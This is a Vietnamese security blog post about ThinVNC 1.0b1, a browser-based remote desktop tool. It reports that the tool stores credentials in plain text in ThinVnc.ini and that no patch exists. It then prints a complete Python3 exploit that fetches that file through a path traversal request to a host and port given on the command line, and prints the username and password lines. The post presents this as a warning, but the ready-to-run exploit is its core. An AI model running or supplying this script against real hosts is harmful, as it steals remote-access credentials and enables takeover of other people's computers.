Khai thác chiếm quyền điều khiển ThinVNC Version 1.0b1

[WhiteHat News #ID:2018]

ThinVNC là một phần mềm cho phép truy cập từ xa trên web (dựa trên trình duyệt, HTML5). Đây là phiên bản cải tiến của giao thức VNC tiêu chuẩn. Nó bao gồm tất cả các kịch bản tương tự, nhưng với hiệu suất tốt hơn nhiều và không cần phải cài đặt máy khách PC hoặc bất kỳ plugin trình duyệt nào. Khi bạn cài đặt ThinVNC trên PC hoặc Laptop hoạt động như "máy chủ", bạn chỉ cần một trình duyệt web để kết nối. Truy cập máy tính để bàn và các tệp từ xa (thậm chí từ các thiết bị di động) và hoạt động như thể bạn vừa ở trong máy tính đó. ThinVNC là một triển khai Truy cập từ xa trên web thuần túy (dựa trên HTML5 & AJAX). Trình khách web hoạt động trên mọi trình duyệt tương thích HTML5 như Chrome, Firefox, Safari, Opera, IE hoặc Edge.

Hiện theo tin tức mình đi hóng dạo và chờ để xem có bản vá chưa nhưng hiện vẫn chưa nên mình viết một bài để lỡ có bác nào xài thì nên dừng sử dụng nó.

Bắt tay vào demo khai thác nó thôi.

Khi tải về cài đặt xong mình thấy nó sinh ra một file ThinVnc.ini trong này chứa full thông tin và không thèm mã hóa, không biết là vô tình hay cố ý :v

Như vậy việc lộ file này coi như toang! Thôi không nói nhiều nữa mình sẽ đưa mã khai thác lên đây để các bạn cũng cảm nhận nhé!

Mã khai thác được viết trên python3

import sys

import os

import requests


def exploit(host,port):

url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"

r = requests.get(url)

body = r.text

print(body.splitlines()[2])

print(body.splitlines()[3])




def main():

if(len(sys.argv)!=3):

print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))

print("Example:\n{} 192.168.0.10 5888")

else:

port = sys.argv[2]

host = sys.argv[1]

exploit(host,port)


if __name__ == '__main__':

main()


Bây giờ các bạn có thể xem clip mô tả khai thác hoặc tải về và nghiên cứu nhé!